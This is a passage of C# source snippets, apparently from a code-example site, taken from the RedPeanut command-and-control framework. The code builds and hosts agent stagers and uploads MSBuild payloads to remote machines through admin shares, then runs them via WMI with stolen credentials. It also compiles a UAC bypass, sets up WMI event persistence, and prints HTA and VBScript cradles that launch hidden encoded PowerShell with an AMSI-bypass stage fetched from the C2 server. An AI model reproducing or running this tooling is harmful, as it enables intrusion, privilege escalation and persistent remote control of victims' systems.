                                     .Replace("#PASSWORD#", password)
                                     .Replace("#DOMAIN#", domain);

                            string spawner = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", 40)));

                            Dictionary <string, string> msbuildargs = new Dictionary <string, string>();
                            msbuildargs.Add("#{taskname}", taskname);

                            MSBuildGenerator gen = new MSBuildGenerator(spawner, msbuildargs);

                            string pathdest = string.Format(@"\\{0}\C$\Windows\temp", targethost);
                            string filename = RandomAString(10, new Random()).ToLower() + ".xml";
                            string filesrc  = Convert.ToBase64String(CompressGZipAssembly(Encoding.Default.GetBytes(gen.GetScriptText())));

                            string destinattionfull = pathdest.TrimEnd('\\') + @"\" + filename;

                            string destinationpath = ".";
                            if (!string.IsNullOrEmpty(pathdest))
                            {
                                destinationpath = pathdest.Replace("\\", "\\\\");
                            }

                            string destinationfilename = "";
                            if (!string.IsNullOrEmpty(filename))
                            {
                                destinationfilename = filename;
                            }

                            // Parse .cs sorce and repalce variable
                            source = File.ReadAllText(Path.Combine(folderrpath, FILEUPLOAD_TEMPLATE));
                            source = Replacer.ReplaceFileUpLoad(source, filesrc, destinationpath, destinationfilename, username, password, domainname);

                            string assembly = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, "FileUpLoader.dll", 40)));

                            //Task agent to copy file to target host
                            RunAssemblyBase64(assembly, "FileUpLoader", new string[] { "pippo" }, agent);

                            //Run msbuld via wmi
                            List <string> args = new List <string>();
                            args.Add("action=create");
                            args.Add("computername=" + targethost);
                            args.Add("username="******"\\" + username);
                            args.Add("password="******"command=C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe C:\\Windows\\temp\\" + destinationfilename);

                            string s = "";
                            foreach (string ss in args.ToArray())
                            {
                                s += ss;
                            }
                            Console.WriteLine("String command: " + s);
                            RunAssembly(PL_MODULE_SHARPWMI, "SharpWMI.Program", args.ToArray(), agent);
                        }
                    }
                }
            } catch (Exception e)
            {
                Console.WriteLine("[*] Error running task build {0}", e.Message);
            }
        }
예제 #22
0
        private void Run()
        {
            List <string> args = new List <string>();

            try
            {
                if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1)
                {
                    return;
                }
                else
                {
                    // Parse .cs sorce and repalce variable
                    string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                    if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
                    {
                        ListenerConfig conf   = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                        string         source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                        source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);

                        string assemblyBase64 = Builder.GenerateDllBase64(source, "tmp_" + filename);

                        byte[] assemblybytte   = Convert.FromBase64String(assemblyBase64);
                        string agentCompBase64 = Convert.ToBase64String(CompressGZipAssembly(assemblybytte));

                        string sourceinstallutil = File.ReadAllText(Path.Combine(folderrpath, INSTALLUTIL_TEMPLATE))
                                                   .Replace("#{assembly}", agentCompBase64);

                        Builder.GenerateExe(sourceinstallutil, filename);

                        if (File.Exists(Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, ASSEMBLY_OIUTPUT_FOLDER, filename)))
                        {
                            if (hosted)
                            {
                                //Add resource to webserver storage
                                C2Manager c2manager = Program.GetC2Manager();
                                c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(null, filename));

                                Console.WriteLine("[*] Resource added to webserver resources");
                                return;
                            }
                            else
                            {
                                //Write file to tmp env dir
                                File.WriteAllBytes(Path.Combine(Path.GetTempPath(), filename),
                                                   File.ReadAllBytes(Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, ASSEMBLY_OIUTPUT_FOLDER, filename)));

                                Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename));
                            }
                        }
                        else
                        {
                            Console.WriteLine("[x] Error creating IndtallUtil dll");
                        }
                    }
                }
            }
            catch (Exception e)
            {
                Console.WriteLine("[*] Error running task build {0}", e.Message);
                return;
            }
        }
예제 #23
0
        public static string ReplaceAgentProfile(string src, string serverkey, int targetframework, ListenerConfig config)
        {
            string source = src
                            .Replace("#HOST#", config.GetHost())
                            .Replace("#PORT#", config.GetPort().ToString())
                            .Replace("#PARAM#", config.GetProfile().HttpPost.Param)
                            .Replace("#SERVERKEY#", RedPeanut.Program.GetServerKey())
                            .Replace("#PAGEGET#", ParseUri(config.GetProfile().HttpGet.ApiPath))
                            .Replace("#PAGEPOST#", ParseUri(config.GetProfile().HttpPost.ApiPath))
                            .Replace("#USERAGENT#", config.GetProfile().UserAgent)
                            .Replace("#PIPENAME#", "")
                            .Replace("#COVERED#", config.GetProfile().HtmlCovered.ToString().ToLower())
                            .Replace("#TARGETCLASS#", config.GetProfile().TargetClass)
                            .Replace("#SPAWN#", config.GetProfile().Spawn)
                            .Replace("#FRAMEWORK#", targetframework.ToString())
                            .Replace("#MANAGED#", config.GetProfile().InjectionManaged.ToString());

            string headers = "";

            foreach (HttpHeader h in config.GetProfile().HttpGet.Client.Headers)
            {
                try
                {
                    if (!h.Name.Equals("Connection"))
                    {
                        int t = (int)Enum.Parse(typeof(HttpRequestHeader), h.Name.Replace("-", ""), true);
                        headers += string.Format("webHeaderCollection.Add(HttpRequestHeader.{0}, \"{1}\");" + Environment.NewLine, h.Name.Replace("-", ""), h.Value);
                    }
                }
                catch (Exception)
                {
                    Console.WriteLine("[x] Error parsing header {0}", h.Name);
                }
            }
            source = source
                     .Replace("#HEADERS#", headers);

            return(source);
        }
        private void Run()
        {
            try
            {
                string host            = ((AgentInstanceHttp)agent).GetAddress();
                int    port            = ((AgentInstanceHttp)agent).GetPort();
                int    profileid       = ((AgentInstanceHttp)agent).GetProfileid();
                int    targetframework = ((AgentInstanceHttp)agent).TargetFramework;
                string pipename        = "";

                if (agent.Pivoter != null)
                {
                    host            = agent.Pivoter.SysInfo.Ip;
                    port            = 0;
                    profileid       = RedPeanutC2.server.GetDefaultProfile();
                    targetframework = agent.TargetFramework;
                    pipename        = agent.AgentId;
                }
                else
                {
                    host            = ((AgentInstanceHttp)agent).GetAddress();
                    port            = ((AgentInstanceHttp)agent).GetPort();
                    profileid       = ((AgentInstanceHttp)agent).GetProfileid();
                    targetframework = agent.TargetFramework;
                }

                string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profileid))
                {
                    string source;

                    if (string.IsNullOrEmpty(pipename))
                    {
                        //Http no pivot stager
                        ListenerConfig conf = new ListenerConfig("", host, port, Program.GetC2Manager().GetC2Server().GetProfile(profileid), profileid);
                        source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                        source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
                    }
                    else
                    {
                        //NamedPipe enable stager
                        ListenerPivotConfig conf = new ListenerPivotConfig("", host, pipename, Program.GetC2Manager().GetC2Server().GetProfile(profileid));
                        source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                        source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
                    }

                    string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework)));

                    /*ModuleConfig modconfig = new ModuleConfig
                     * {
                     *  Assembly = stagerstr,
                     *  Method = "Execute",
                     *  Moduleclass = "RedPeanutRP",
                     *  Parameters = new string[] { "pippo" }
                     * };
                     *
                     * TaskMsg task = new TaskMsg
                     * {
                     *  TaskType = "module",
                     *  ModuleTask = modconfig,
                     *  Agentid = agent.AgentId
                     * };
                     *
                     * if (agent.Pivoter != null)
                     *  task.AgentPivot = agent.Pivoter.AgentId;
                     *
                     */

                    source = File.ReadAllText(Path.Combine(folderrpath, UACTOKEN_TEMPLATE))
                             .Replace("#NUTCLR#", Convert.ToBase64String(CompressGZipAssembly(
                                                                             Builder.GenerateShellcode(stagerstr, RandomAString(10, new Random()) + ".exe", "RedPeanutRP", "Execute", new string[] { "pippo" })
                                                                             ))
                                      )
                             .Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profileid).Spawn)
                             .Replace("#BINARY#", binary)
                             .Replace("#ARGUMENTS#", arguments)
                             .Replace("#PATH#", path);

                    string uacbypass = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework, compprofile: CompilationProfile.UACBypass)));
                    RunAssemblyBase64(
                        uacbypass,
                        "TokenManipulation",
                        new string[] { " " },
                        agent);
                }
            }
            catch (Exception)
            {
                Console.WriteLine("[*] Errore generating task");
            }
        }
예제 #25
0
        private void Run()
        {
            List <string> args = new List <string>();

            try
            {
                if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1)
                {
                    return;
                }
                else
                {
                    // Parse .cs sorce and repalce variable
                    string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                    if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
                    {
                        ListenerConfig conf   = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                        string         source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                        source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);

                        string assemblyBase64 = Builder.GenerateDllBase64(source, filename);

                        Dictionary <string, string> arg = new Dictionary <string, string>();
                        arg.Add("#{lhost}", lhost);
                        arg.Add("#{lport}", lport.ToString());

                        string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri;

                        uricontent = uricontent.TrimStart('/');

                        if (!uricontent.EndsWith("/"))
                        {
                            uricontent += "/";
                        }

                        arg.Add("#{uri}", uricontent + "s2_" + filename);

                        byte[] assemblybytte   = Convert.FromBase64String(assemblyBase64);
                        string agentCompBase64 = Convert.ToBase64String(CompressAssembly(assemblybytte));

                        Dictionary <string, string> argagent = new Dictionary <string, string>();
                        argagent.Add("#{bytelen}", assemblybytte.Length.ToString());

                        PowershellCradleGenerator gen_s0 = new PowershellCradleGenerator(agentCompBase64, arg);
                        PowershellAmsiGenerator   gen_s1 = new PowershellAmsiGenerator(agentCompBase64, arg);
                        PowershellAgentGenerator  gen_s2 = new PowershellAgentGenerator(agentCompBase64, argagent);

                        if (hosted)
                        {
                            //Add resource to webserver storage
                            C2Manager c2manager = Program.GetC2Manager();

                            c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(gen_s1, filename));
                            c2manager.GetC2Server().RegisterWebResource("s2_" + filename, new WebResourceInstance(gen_s2, "s2_" + filename));
                            Console.WriteLine("[*] Resource added to webserver resources");
                            Console.WriteLine("[*] Starting point at https://{0}:{1}/{2}", lhost, lport, uricontent + filename);
                            Console.WriteLine("[*]");
                            Console.WriteLine("[*] Cradle example");
                            Console.WriteLine("[*]");
                            Console.WriteLine("<script language = \"VBScript\">");
                            Console.WriteLine("    Function etaget()");
                            Console.WriteLine("");
                            Console.WriteLine("        Dim ahsten");
                            Console.WriteLine("        Set ahsten = CreateObject(\"Wscript.Shell\")");
                            Console.WriteLine("        ahsten.run \"powershell.exe -nop -w 1 -enc {0}\", 0, true", gen_s0.GetScriptText());
                            Console.WriteLine("    End Function");
                            Console.WriteLine("");
                            Console.WriteLine("    etaget");
                            Console.WriteLine("    self.close");
                            Console.WriteLine("</script>");
                            Console.WriteLine("[*]");
                            return;
                        }
                        else
                        {
                            //Write file to tmp env dir
                            File.WriteAllText(Path.Combine(Path.GetTempPath(), filename), gen_s1.GetScriptText());
                            File.WriteAllText(Path.Combine(Path.GetTempPath(), "s2_" + filename), gen_s2.GetScriptText());

                            Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename));
                            Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), "s2_" + filename));
                        }
                    }
                }
            }
            catch (Exception e)
            {
                Console.WriteLine("[*] Error running task build {0}", e.Message);
                return;
            }
        }
예제 #26
0
        private void Run()
        {
            try
            {
                List <string> args = new List <string>();
                if (!string.IsNullOrEmpty(processname) && !string.IsNullOrEmpty(eventname))
                {
                    //Create webresource
                    //Register web resource

                    string         folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                    string         filename    = RandomAString(10, new Random()).ToLower();
                    ListenerConfig conf        = new ListenerConfig("",
                                                                    ((AgentInstanceHttp)agent).GetAddress(),
                                                                    ((AgentInstanceHttp)agent).GetPort(),
                                                                    Program.GetC2Manager().GetC2Server().GetProfile(((AgentInstanceHttp)agent).GetProfileid()),
                                                                    ((AgentInstanceHttp)agent).GetProfileid());

                    string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                    source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);

                    string assemblyBase64 = Builder.GenerateDllBase64(source, filename + ".dll");

                    byte[] assemblybytte   = Convert.FromBase64String(assemblyBase64);
                    string agentCompBase64 = Convert.ToBase64String(CompressAssembly(assemblybytte));

                    Dictionary <string, string> argagent = new Dictionary <string, string>();
                    argagent.Add("#{bytelen}", assemblybytte.Length.ToString());

                    string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(((AgentInstanceHttp)agent).GetProfileid()).ContentUri;

                    uricontent = uricontent.TrimStart('/');

                    if (!uricontent.EndsWith("/"))
                    {
                        uricontent += "/";
                    }

                    Dictionary <string, string> arg = new Dictionary <string, string>
                    {
                        { "#{lhost}", ((AgentInstanceHttp)agent).GetAddress() },
                        { "#{lport}", ((AgentInstanceHttp)agent).GetPort().ToString() },
                        { "#{uri}", uricontent + "s2_" + filename + ".ps1" }
                    };

                    PowershellAmsiGenerator  gen_s1 = new PowershellAmsiGenerator(agentCompBase64, arg);
                    PowershellAgentGenerator gen_s2 = new PowershellAgentGenerator(agentCompBase64, argagent);

                    //Add resource to webserver storage
                    C2Manager c2manager = Program.GetC2Manager();

                    c2manager.GetC2Server().RegisterWebResource(filename + ".ps1", new WebResourceInstance(gen_s1, filename + ".ps1"));
                    c2manager.GetC2Server().RegisterWebResource("s2_" + filename + ".ps1", new WebResourceInstance(gen_s2, "s2_" + filename + ".ps1"));
                    Console.WriteLine("[*] Resource added to webserver resources");

                    string proto = "";

                    if (ssl)
                    {
                        proto = "https";
                    }
                    else
                    {
                        proto = "http";
                    }

                    string url = string.Format("{0}://{1}:{2}/{3}{4}", proto, ((AgentInstanceHttp)agent).GetAddress(), ((AgentInstanceHttp)agent).GetPort(), uricontent, filename + ".ps1");

                    string perssrc = File.ReadAllText(Path.Combine(folderrpath, PERSWMI_TEMPLATE));

                    perssrc = Replacer.ReplacePersWMI(perssrc, eventname, url, processname, encoded);

                    RunAssemblyBase64(
                        Convert.ToBase64String(
                            CompressGZipAssembly(
                                Builder.BuidStreamAssembly(perssrc, RandomAString(10, new Random()).ToLower() + ".dll", 40, compprofile: CompilationProfile.Persistence)
                                )
                            ),
                        "PersWMI",
                        new string[] { " " },
                        agent);

                    return;
                }
            }
            catch (Exception e)
            {
                Console.WriteLine("[x] Error generating task {0}", e.Message);
            }
        }
예제 #27
0
 public RedPeanutC2(C2Server server, ListenerConfig lconfig)
 {
     this.Lconfig       = lconfig;
     RedPeanutC2.server = server;
     this.ssl           = lconfig.GetSsl();
 }
예제 #28
0
        private void Run()
        {
            List <string> args = new List <string>();

            try
            {
                if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1)
                {
                    return;
                }
                else
                {
                    if (lang == "vbs")
                    {
                        string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                        if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
                        {
                            //Building agent
                            ListenerConfig conf   = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                            string         source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                            source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 35, conf);
                            string outfilename = RandomAString(10, new Random()) + ".dll";
                            Builder.GenerateDll(source, outfilename, 35);

                            //Add resource to webserver
                            C2Manager c2manager = Program.GetC2Manager();
                            c2manager.GetC2Server().RegisterWebResource(outfilename, new WebResourceInstance(null, outfilename));

                            string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri.TrimStart('/');
                            if (!uricontent.EndsWith("/"))
                            {
                                uricontent += "/";
                            }

                            string resourcepath = uricontent + outfilename;

                            //Build shooter assembly
                            source = File.ReadAllText(Path.Combine(folderrpath, SHOOTER_TEMPLATE));
                            source = Replacer.ReplaceAgentShooter(source, resourcepath, conf);

                            string assemblyBase64 = Builder.GenerateDllBase64(source, RandomAString(10, new Random()) + ".dll", 35);

                            HtaVBSGenerator gen = new HtaVBSGenerator(assemblyBase64, null);

                            if (hosted)
                            {
                                //Add resource to webserver storage
                                c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(gen, filename));
                                Console.WriteLine("[*] Resource added to webserver resources");
                                Console.WriteLine("[*] Starting point at https://{0}:{1}/{2}", lhost, lport, uricontent + filename);
                                return;
                            }
                            else
                            {
                                //Write file to tmp env dir
                                File.WriteAllText(Path.Combine(Path.GetTempPath(), filename), gen.GetScriptText());
                                Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename));
                            }
                        }
                    }
                    else
                    {
                        if (lang == "powershell")
                        {
                            string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                            if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
                            {
                                string         psfilename = RandomString(10, new Random()) + ".ps1";
                                ListenerConfig conf       = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                                string         source     = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                                source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);

                                string assemblyBase64 = Builder.GenerateDllBase64(source, RandomString(10, new Random()) + ".dll");

                                Dictionary <string, string> arg = new Dictionary <string, string>();
                                arg.Add("#{lhost}", lhost);
                                arg.Add("#{lport}", lport.ToString());

                                string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri;

                                uricontent = uricontent.TrimStart('/');

                                if (!uricontent.EndsWith("/"))
                                {
                                    uricontent += "/";
                                }

                                arg.Add("#{uri}", uricontent + "s2_" + psfilename);

                                byte[] assemblybytte   = Convert.FromBase64String(assemblyBase64);
                                string agentCompBase64 = Convert.ToBase64String(CompressAssembly(assemblybytte));

                                Dictionary <string, string> argagent = new Dictionary <string, string>();
                                argagent.Add("#{bytelen}", assemblybytte.Length.ToString());

                                PowershellCradleGenerator gen_s0 = new PowershellCradleGenerator(agentCompBase64, arg);
                                PowershellAmsiGenerator   gen_s1 = new PowershellAmsiGenerator(agentCompBase64, arg);
                                PowershellAgentGenerator  gen_s2 = new PowershellAgentGenerator(agentCompBase64, argagent);

                                HtaPowerShellGenerator gen = new HtaPowerShellGenerator(gen_s0.GetScriptText(), null);

                                if (hosted)
                                {
                                    //Add resource to webserver storage
                                    C2Manager c2manager = Program.GetC2Manager();

                                    c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(gen, filename));
                                    c2manager.GetC2Server().RegisterWebResource(psfilename, new WebResourceInstance(gen_s1, psfilename));
                                    c2manager.GetC2Server().RegisterWebResource("s2_" + psfilename, new WebResourceInstance(gen_s2, "s2_" + psfilename));
                                    Console.WriteLine("[*] Resource added to webserver resources");
                                    Console.WriteLine("[*] Starting point at https://{0}:{1}/{2}", lhost, lport, uricontent + filename);
                                    return;
                                }
                                else
                                {
                                    //Write file to tmp env dir
                                    File.WriteAllText(Path.Combine(Path.GetTempPath(), filename), gen.GetScriptText());
                                    File.WriteAllText(Path.Combine(Path.GetTempPath(), psfilename), gen_s1.GetScriptText());
                                    File.WriteAllText(Path.Combine(Path.GetTempPath(), "s2_" + psfilename), gen_s2.GetScriptText());

                                    Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename));
                                    Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), psfilename));
                                    Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), "s2_" + psfilename));
                                }
                            }
                        }
                        else
                        {
                            Console.WriteLine("[*] Language not supported {0} (powershell,vbs)", lang);
                            return;
                        }
                    }
                }
            }catch (Exception e)
            {
                Console.WriteLine("[*] Error running task build {0}", e.Message);
                return;
            }
        }